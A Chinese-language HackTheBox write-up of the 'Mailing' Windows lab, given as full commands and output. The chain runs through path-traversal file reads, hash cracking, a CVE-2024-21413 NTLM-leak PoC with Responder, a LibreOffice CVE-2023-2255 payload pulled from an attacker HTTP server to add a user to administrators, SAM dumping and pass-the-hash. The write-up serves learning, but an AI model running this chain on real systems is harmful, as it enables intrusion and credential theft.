HackTheBox-Machines Mailing Writeup

第一次打 HackTheBox 的 Windows 靶機～～～

Exploitation

先 nmap：

└──╼ [★]$ nmap -sV 10.129.241.62
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-15 07:36 CDT
Nmap scan report for 10.129.241.62
Host is up (0.086s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
25/tcp  open  smtp          hMailServer smtpd
80/tcp  open  http          Microsoft IIS httpd 10.0
110/tcp open  pop3          hMailServer pop3d
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp open  imap          hMailServer imapd
445/tcp open  microsoft-ds?
465/tcp open  ssl/smtp      hMailServer smtpd
587/tcp open  smtp          hMailServer smtpd
993/tcp open  ssl/imap      hMailServer imapd
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.73 seconds

酷欸好多東西開著。
whatweb 看一下 hostname：

└──╼ [★]$ whatweb 10.129.241.62
http://10.129.241.62 [301 Moved Permanently] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], IP[10.129.241.62], Microsoft-IIS[10.0], RedirectLocation[http://mailing.htb], Title[Documento movido], X-Powered-By[ASP.NET]
ERROR Opening: http://mailing.htb - no address for mailing.htb

加到 /etc/hosts：

└──╼ [★]$ echo "10.129.241.62 mailing.htb" | sudo tee -a /etc/hosts
10.129.241.62 mailing.htb

ffuf 掃一下路徑：

└──╼ [★]$ ffuf -u http://mailing.htb/FUZZ -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://mailing.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

assets                  [Status: 301, Size: 160, Words: 9, Lines: 2, Duration: 120ms]
:: Progress: [100000/100000] :: Job [1/1] :: 511 req/sec :: Duration: [0:04:47] :: Errors: 0 ::

看到一個 assets，status 301，先有個印象就好
網站東西蠻多的還有一個 https://www.hmailserver.com/ 裡面蠻多功能的，但在首頁底下有個下載功能，滑鼠 hover 在按鈕上會看到：

我們可以嘗試撈其他東西，例如 http://mailing.htb/download.php?file=../../../../../../../Windows/System32/Drivers/etc/hosts 可以撈到 /etc/hosts：

└──╼ [★]$ cat hosts 
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost

127.0.0.1	mailing.htb

那竟然確定可以任意下載的話，我們首先感興趣的可能是剛剛提到的 hMailServer 的 config file，那先查一下 hMailServer 是什麼：

hMailServer was a free email server for Windows created by Martin Knafve. It ran as a Windows service and includes administration tools for management and backup. It had support for IMAP, POP3, and SMTP email protocols. It could use external database engines such as MySQL, MS SQL or PostgreSQL, or an internal MS SQL Compact Edition engine to store configuration and index data. The actual email messages were stored on disk in a raw MIME format. As of January 15th, 2022, active support and development were officially halted, although version 5.6 will continue to receive updates for critical bugs.

總結來說是一個支援 IMAP，POP3 還有 SMTP 的免費 windows email server。
搜尋一下 hMailServer config file default path：

Where is the hMailServer.ini file located?
C:\Program Files\hMailServer\Bin
Open hMailServer. ini, typically located under C:\Program Files\hMailServer\Bin. Restart the hMailServer service.

那我們嘗試一下上面的路徑放到我們的 payload：
http://mailing.htb/download.php?file=../../../../../../Program Files/hMailServer/Bin/hMailServer.ini
結果檔案找不到：

又試了一下在 http://mailing.htb/download.php?file=../../../../../../Program%20Files%20(x86)/hMailServer/Bin/hMailServer.ini 找到，看一下 hMailServer.ini 的內容：

└──╼ [★]$ cat hMailServer.ini 
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

看到一串密文的密碼：0a9f8ad8bf896b501dde74f08efd7e4c
可以用 hash-identifier 查看密文的類別：

└──╼ [★]$ hash-identifier 0a9f8ad8bf896b501dde74f08efd7e4c
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   [email protected] #
   #########################################################################
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

看起來是 md5，用 hashcat 爆看看：

└──╼ [★]$ hashcat '0a9f8ad8bf896b501dde74f08efd7e4c' -m 0 -a 0 -o output.txt /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-DO-Regular, skipped

OpenCL API (OpenCL 2.1 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: DO-Regular, 3937/7938 MB (992 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 1 MB

Dictionary cache building /usr/share/wordlists/rockyou.txt: 33553434 bytes (23.9Dictionary cache building /usr/share/wordlists/rockyou.txt: 134213744 bytes (95.Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

Approaching final keyspace - workload adjusted.           

Session..........: hashcat                                
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: 0a9f8ad8bf896b501dde74f08efd7e4c
Time.Started.....: Thu Aug 15 20:46:36 2024 (4 secs)
Time.Estimated...: Thu Aug 15 20:46:40 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:  3672.2 kH/s (0.16ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#2....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]

Started: Thu Aug 15 20:46:25 2024
Stopped: Thu Aug 15 20:46:41 2024

喔不失敗，我們換個線上工具：

又失敗？回去看一下才發現剛剛 hMailServer.ini 有兩組 password：

AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
Password=0a9f8ad8bf896b501dde74f08efd7e4c

傻眼，改成爆 admin pw

└──╼ [★]$ hashcat '841bb5acfa6779ae432fd7a4e6600ba7' -m 0 /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-DO-Regular, skipped

OpenCL API (OpenCL 2.1 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: DO-Regular, 3937/7938 MB (992 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

841bb5acfa6779ae432fd7a4e6600ba7:homenetworkingadministrator
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 841bb5acfa6779ae432fd7a4e6600ba7
Time.Started.....: Thu Aug 15 21:01:42 2024 (3 secs)
Time.Estimated...: Thu Aug 15 21:01:45 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:  3248.8 kH/s (0.18ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7563264/14344385 (52.73%)
Rejected.........: 0/7563264 (0.00%)
Restore.Point....: 7561216/14344385 (52.71%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#2....: homie g 1 -> home38119

Started: Thu Aug 15 21:01:40 2024
Stopped: Thu Aug 15 21:01:45 2024

結果反而 admin 的密碼馬上就找到了…
841bb5acfa6779ae432fd7a4e6600ba7:homenetworkingadministrator
再來我們可以回到前面 nmap，會看到有蠻多服務是開啟的，其中有一個服務是 pop3，搜尋一下這是什麼：

Post Office Protocol (English: Post Office Protocol , abbreviation: POP ) is a member of the TCP/IP protocol family and was first defined by RFC 1939 issued in May 1996 . This protocol is primarily used to support remote management of email on the server using a client . The latest version is POP3 , whose full name is “Post Office Protocol - Version 3”, and the POP3 protocol that provides SSL encryption is called POP3S .

簡單來說是一個可以遠端管理信件的協議，用法維基百科上也有寫用法：

所以我們可以拿剛剛解出來的帳密登入看看：

└──╼ [★]$ telnet 10.129.241.62 110
Trying 10.129.241.62...
Connected to 10.129.241.62.
Escape character is '^]'.
+OK POP3
USER [email protected]
+OK Send your password
PASS homenetworkingadministrator
+OK Mailbox locked and ready
stat
+OK 0 0
list
+OK 0 messages (0 octets)
.

竟然是空的 QQ
到這邊我們參考一下網路上的解法，發現我們可以去打一個今年 Microsoft Office Outlook 的 CVE，這邊學到凡事都先查有沒有 CVE
https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

This script presents a proof of concept (PoC) for CVE-2024-21413, a significant security vulnerability discovered in Microsoft Outlook with a CVSS of 9.8. Termed the #MonikerLink bug, this vulnerability has far-reaching implications, including the potential leakage of local NTLM information and the possibility of remote code execution. Moreover, it highlights an attack vector that could bypass Office Protected View, thereby extending its threat to other Office applications.

這個漏洞主要是利用洩漏 NTLM 來達成 RCE，那這邊同時來看一下 NTLM 是什麼東西：

Windows New Technology LAN Manager (NTLM) is a suite of security protocols offered by Microsoft to authenticate users’ identity and protect the integrity and confidentiality of their activity. At its core, NTLM is a single sign on (SSO) tool that relies on a challenge-response protocol to confirm the user without requiring them to submit a password.

Despite known vulnerabilities, NTLM remains widely deployed even on new systems in order to maintain compatibility with legacy clients and servers. While NTLM is still supported by Microsoft, it has been replaced by Kerberos as the default authentication protocol in Windows 2000 and subsequent Active Directory (AD) domains.

NTLM 簡單來說是一個 SSO 工具，讓使用者可以登入時不用要求他們輸入密碼，但現在漸漸被 Kerberos 取代。
好那在開始攻擊前我們需要先開始錄封包，我們可以用一個網路滲透測試工具 Responder 來幫忙

└─$ sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie ([email protected])
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.26]
    Responder IPv6             [dead:beef:2::1018]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-I72N069R99L]
    Responder Domain Name      [HO9K.LOCAL]
    Responder DCE-RPC Port     [46780]

[+] Listening for events...

打開之後就會開始聽，這時候執行我們的 payload：

└─$ python3 CVE-2024-21413.py --server mailing.htb --port 587 --username [email protected] --password homenetworkingadministrator --sender [email protected] --recipient [email protected] --url "\\10.10.14.26" --subject XD

CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
Alexander Hagenah / @xaitax / [email protected]

✅ Email sent successfully.

送出去之後就會拿到下面的資訊：

[SMB] NTLMv2-SSP Client : 10.10.14.26
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash : maya::MAILING:95de498996a31a8c:D2BABC773FF653EE285D33E6FE5493A6:010100000000000080F2298488B6DA015D1DCBB264E2490C0000000002000800530059005500490001001E00570049004E002D005A004F0042005000340036004D0038004B005600410004003400570049004E002D005A004F0042005000340036004D0038004B00560041002E0053005900550049002E004C004F00430041004C000300140053005900550049002E004C004F00430041004C000500140053005900550049002E004C004F00430041004C000700080080F2298488B6DA0106000400020000000800300030000000000000000000000000200000C9E5BC0C7D84E948E12CF5D180E24C511C66B448EF8DB310790EDB6AD72669FF0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00370031000000000000000000

然後我們可以用 hashcat 嘗試幫我們解這個 NTLMv2：

└─$ hashcat -m 5600 -a 0 -o output.txt ntlm.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i5-12400, 2918/5901 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385


Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: MAYA::MAILING:95de498996a31a8c:d2babc773ff653ee285d...000000
Time.Started.....: Fri Aug 16 17:25:41 2024 (2 secs)
Time.Estimated...: Fri Aug 16 17:25:43 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  3185.0 kH/s (0.81ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5935104/14344385 (41.38%)
Rejected.........: 0/5935104 (0.00%)
Restore.Point....: 5931008/14344385 (41.35%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: m6161 -> m3808w

Started: Fri Aug 16 17:25:22 2024
Stopped: Fri Aug 16 17:25:44 2024

┌──(kazma㉿kali)-[~/hack_the_box/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─$ cat output.txt
MAYA::MAILING:95de498996a31a8c:d2babc773ff653ee285d33e6fe5493a6:010100000000000080f2298488b6da015d1dcbb264e2490c0000000002000800530059005500490001001e00570049004e002d005a004f0042005000340036004d0038004b005600410004003400570049004e002d005a004f0042005000340036004d0038004b00560041002e0053005900550049002e004c004f00430041004c000300140053005900550049002e004c004f00430041004c000500140053005900550049002e004c004f00430041004c000700080080f2298488b6da0106000400020000000800300030000000000000000000000000200000c9e5bc0c7d84e948e12cf5d180e24c511c66b448ef8db310790edb6ad72669ff0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00370031000000000000000000:m4y4ngs4ri

找到密碼：m4y4ngs4ri
好，有了帳密之後，這裡要介紹一個神器叫 evil-winrm ，順便附上他的超帥圖片和說明：

This shell is the ultimate WinRM shell for hacking/pentesting.

WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.

This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.

It is based mainly in the WinRM Ruby library which changed its way to work since its version 2.0. Now instead of using WinRM protocol, it is using PSRP (Powershell Remoting Protocol) for initializing runspace pools as well as creating and processing pipelines.

總結來說 evil-winrm 是一個針對 Windows 的遠程管理工具，透過 PSRP 協議並且開在 5985 port。
用法如下：

└─$ evil-winrm -i 10.129.231.40 -u maya -p m4y4ngs4ri

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Documents> ls


    Directory: C:\Users\maya\Documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/13/2024   4:49 PM                WindowsPowerShell
-a----         4/11/2024   1:24 AM            807 mail.py
-a----         3/14/2024   4:30 PM            557 mail.vbs

進去了！終於…

*Evil-WinRM* PS C:\Users\maya> cd Desktop
*Evil-WinRM* PS C:\Users\maya\Desktop> ls


    Directory: C:\Users\maya\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/28/2024   7:34 PM           2350 Microsoft Edge.lnk
-ar---         8/16/2024  10:41 AM             34 user.txt


ca*Evil-WinRM* PS C:\Users\maya\Desktop> cat user.txt

user flag 在 Desktop 下面。
接著我們可以逛個幾圈，然後你就會跟我一樣放棄去偷看解答發現 LibreOffice 的版本是有 CVE 的 這誰找得到：

*Evil-WinRM* PS C:\Program Files\LibreOffice\readmes> cat readme_es.txt


======================================================================

Léame de LibreOffice 7.4

======================================================================

exploit：
https://github.com/elweth-sec/CVE-2023-2255

└──╼ [★]$ cd CVE-2023-2255/
└──╼ [★]$ python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add'
File output.odt has been created !

我們執行 exploit 並執行 command 把 localgroup 的 maya 加到 Administrators 的群組裡。
這裡生成了一個 output.odt 要讓我們到目標機器執行，.odt 文件可以用 LibreOffice 打開。
那我們現在開個 http server 讓我們可以從目標機器載下來。

└──╼ [★]$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

evil-winrm：

*Evil-WinRM* PS C:\Users\maya\Documents> Invoke-WebRequest -Uri "http://10.10.14.26:8000/output.odt" -OutFile "./output.odt"
*Evil-WinRM* PS C:\Users\maya\Documents> ls


    Directory: C:\Users\maya\Documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/13/2024   4:49 PM                WindowsPowerShell
-a----         4/11/2024   1:24 AM            807 mail.py
-a----         3/14/2024   4:30 PM            557 mail.vbs
-a----         8/17/2024   5:07 AM          30526 output.odt

我們成功載下來了，ls 後確定可以看到 output.odt。
接著我們就來提權：

*Evil-WinRM* PS C:\Users\maya\Documents> cd /Imp*
*Evil-WinRM* PS C:\Important Documents> curl -o output.odt 10.10.14.26:8000/output.odt
*Evil-WinRM* PS C:\Important Documents> net users maya
User name                    maya
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2024-04-12 4:16:20 AM
Password expires             Never
Password changeable          2024-04-12 4:16:20 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2024-08-17 6:11:03 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use*Usuarios
                             *Usuarios de escritori
Global Group memberships     *Ninguno
The command completed successfully.

*Evil-WinRM* PS C:\Important Documents> ./output.odt
*Evil-WinRM* PS C:\Important Documents> net users maya
User name                    maya
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2024-04-12 4:16:20 AM
Password expires             Never
Password changeable          2024-04-12 4:16:20 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2024-08-17 6:11:03 AM

Logon hours allowed          All

Local Group Memberships      *Administradores      *Remote Management Use
                             *Usuarios             *Usuarios de escritori
Global Group memberships     *Ninguno
The command completed successfully.

雖然不知道為什麼，但是 output.odt 在家目錄下的 Documents 執行不會成功，要在 C:\Important Documents 執行才會生效，可以看到執行前後 user maya 的 Local Group Memberships 變成 Administradores。
接下來我們要用 localadmin 的身份登入會需要他的 hash，我們可以用 crackmapexec：

└──╼ [★]$ crackmapexec smb 10.129.231.40 -u maya -p "m4y4ngs4ri" --sam
[*] First time use detected
[*] Creating home directory structure
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
[*] Creating default workspace
[*] Initializing MSSQL protocol database
[*] Initializing WINRM protocol database
[*] Initializing LDAP protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing VNC protocol database
[*] Initializing WMI protocol database
[*] Initializing FTP protocol database
[*] Initializing RDP protocol database
[*] Copying default configuration file
SMB         10.129.231.40   445    MAILING          [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB         10.129.231.40   445    MAILING          [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
SMB         10.129.231.40   445    MAILING          [*] Dumping SAM hashes
SMB         10.129.231.40   445    MAILING          Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.231.40   445    MAILING          Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.231.40   445    MAILING          DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.231.40   445    MAILING          WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB         10.129.231.40   445    MAILING          localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB         10.129.231.40   445    MAILING          maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
SMB         10.129.231.40   445    MAILING          [+] Added 6 SAM hashes to the database

我們成功用 maya 登入並取得上面那些帳號存在 SAM 裡面的 hash 了。
接著我們可以嘗試用 impacket-wmiexec 透過 localadmin 登入取得 root flag：

└──╼ [★]$ impacket-wmiexec localadmin@10.129.231.40 -hashes "aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae"
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd Users
C:\Users>cd localadmin
C:\Users\localadmin>cd Desktop
C:\Users\localadmin\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 9502-BA18

 Directory of C:\Users\localadmin\Desktop

2024-04-12  06:10 AM    <DIR>          .
2024-04-12  06:10 AM    <DIR>          ..
2024-02-27  05:30 PM             2,350 Microsoft Edge.lnk
2024-08-16  10:41 AM                34 root.txt
               2 File(s)          2,384 bytes
               2 Dir(s)   4,476,936,192 bytes free

C:\Users\localadmin\Desktop>type root.txt

進去之後就可以在 localadmin 的桌面看到，對了這邊登入後是 cmd，所以要用 cmd 的指令。

Summary

第一次打 windows 的靶機超級卡，一個 easy 題就寫了一整天，感覺還有很多知識點沒有弄的很懂，所以這次參考了很多網路上的解法才弄出來，但還是學到不少東西，看來接下來打 windows 靶機前要先補齊一些知識 QQ

Reference

https://blog.csdn.net/whale_waves/article/details/138896310
https://medium.com/@EnisisTourist/htb-mailing-writeup-walkthrough-dcc8f04159c4

Pwned !!!